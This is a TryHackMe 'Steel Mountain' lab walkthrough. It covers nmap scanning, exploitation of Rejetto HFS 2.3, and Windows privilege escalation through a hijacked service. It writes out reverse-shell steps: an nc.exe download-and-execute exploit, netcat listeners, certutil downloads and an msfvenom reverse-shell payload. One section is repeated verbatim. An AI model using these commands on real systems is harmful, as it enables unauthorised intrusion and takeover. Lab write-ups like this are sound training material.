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2020-10-27 02:51:49 +05:00
#TryHackMe-Steel Mountain
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-26 23:25 PKT [13/93]
Stats: 0:02:10 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 98.96% done; ETC: 23:27 (0:00:00 remaining)
Stats: 0:02:12 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 98.96% done; ETC: 23:27 (0:00:00 remaining)
Nmap scan report for
Host is up (0.18s latency).
Not shown: 988 closed ports
80/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: Site doesn't have a title (text/html).
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp open ssl/ms-wbt-server?
|_ssl-date: 2020-10-26T18:26:37+00:00; 0s from scanner time.
8080/tcp open http HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49163/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_nbstat: NetBIOS name: STEELMOUNTAIN, NetBIOS user: <unknown>, NetBIOS MAC: 02:84:f3:74:2b:f5 (unknown)
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-10-26T18:26:30
|_ start_date: 2020-10-26T18:21:06
## PORT 80
`Who is the employee of the month?`
Visit the web page on port 80 then look at the source of the web page and you'll image name which is the answer to the question.
<img src="https://imgur.com/rimrVAT.png"/>
<img src="https://imgur.com/a5L2WPI.png"/>
`Scan the machine with nmap. What is the other port running a web server on?`
PORT 8080
## PORT 8080
<img src="https://imgur.com/s1URJrD.png"/>
Clicking below at the link `HttpFileServer 2.3` will redirect you to a page
<img src="https://imgur.com/nGfv4pR.png"/>
`Take a look at the other web server. What file server is running?`
Rejetto Http File Server
`What is the CVE number to exploit this file server?`
## Searchsploit
Now we know that it's using Rejetto Http File Server version 2.3 so let's find exploits for it
<img src="https://imgur.com/WAK96sW.png"/>
Let's try using this exploit
<img src="https://imgur.com/I4plTzW.png"/>
Change the local IP and local port if you want doesn't matter if you use the default `443` port in this exploit
<img src="https://imgur.com/LUkkYbl.png"/>
Now host the `nc.exe` on you local machine which can be downloaded from github `https://github.com/int0x33/nc.exe/blob/master/nc.exe` or if your using kali linux then it will be available to `/usr/share/windows-resources/binaries/nc.exe`
Hosting this file can be through python but remember to keep the port on `80` because that's the default port that http listens on
`python3 -m http.server 80`
Also set up a net cat listener `nc -lvp [port]`
Run the exploit with python2 39161 <target machine> 8080
<img src="https://imgur.com/UGhffUg.png"/>
Run it again because the first time you ran it just downloaded it but now when you run this exploit again it will execute `nc.exe`
<img src="https://imgur.com/I6rDzIu.png"/>
Now upload `winPEAS.exe` on the machine for that host that file locally then download it on targeted machine
C:\Users\bill\Desktop>certutil.exe -urlcache -f winpeas.exe
certutil.exe -urlcache -f winpeas.exe
**** Online ****
CertUtil: -URLCache command completed successfully.
Volume in drive C has no label.
Volume Serial Number is 2E4A-906A
Directory of C:\Users\bill\Desktop
10/26/2020 02:31 PM <DIR> .
10/26/2020 02:31 PM <DIR> ..
10/26/2020 01:57 PM 600,580 PowerUp.ps1
09/27/2019 05:42 AM 70 user.txt
10/26/2020 02:31 PM 472,064 winpeas.exe
3 File(s) 1,072,714 bytes
2 Dir(s) 44,155,019,264 bytes free
Now by simply typing .\winpeas.exe
<img src="https://imgur.com/MqqNtki.png"/>
We can see that this services can be exploited so let's generate a payload named as `ASCService.exe`
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=6666 -e x86/shikata_ga_nai -f exe -o ASCService.exe
Set up the netcat listener and stop that service after that upload it to the target machine and restart the service again
### Stoppping the service
C:\Program Files (x86)\IObit\Advanced SystemCare>sc stop AdvancedSystemCareService9
sc stop AdvancedSystemCareService9
SERVICE_NAME: AdvancedSystemCareService9
TYPE : 110 WIN32_OWN_PROCESS (interactive)
WIN32_EXIT_CODE : 0 (0x0)
### Starting the service
<img src="https://imgur.com/59JbctJ.png"/>
<img src="https://imgur.com/I8EfqsJ.png"/>
## Metasploit
<img src="https://imgur.com/m7CpvJo.png"/>
<img src="https://imgur.com/ovTUsAq.png"/>
No we want to escalate our root privileges so we will run `Powerup.ps1` powershell script to look for misconfigurations on targeted windows machine
<img src="https://imgur.com/rI8pOGx.png"/>
To enter into powershell first write `load powershell` then `powershell_shell`
<img src="https://imgur.com/3dHlaT5.png"/>
Run `. .\PowerUp.ps1` and `Invoke-AllChecks`
<img src="https://imgur.com/x6OYhwJ.png"/>
Now check for service having `canRestart` set to True
<img src="https://imgur.com/AaGL54a.png"/>
And name of the service is `AdvancedSystemCareService9`
Now generate a payload with name `ASCService.exe`
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=6666 -e x86/shikata_ga_nai -f exe -o ASCService.exe
Set up the netcat listener and stop that service after that upload it to the target machine and restart the service again
### Stoppping the service
C:\Program Files (x86)\IObit\Advanced SystemCare>sc stop AdvancedSystemCareService9
sc stop AdvancedSystemCareService9
SERVICE_NAME: AdvancedSystemCareService9
TYPE : 110 WIN32_OWN_PROCESS (interactive)
WIN32_EXIT_CODE : 0 (0x0)
### Starting the service
<img src="https://imgur.com/59JbctJ.png"/>
<img src="https://imgur.com/I8EfqsJ.png"/>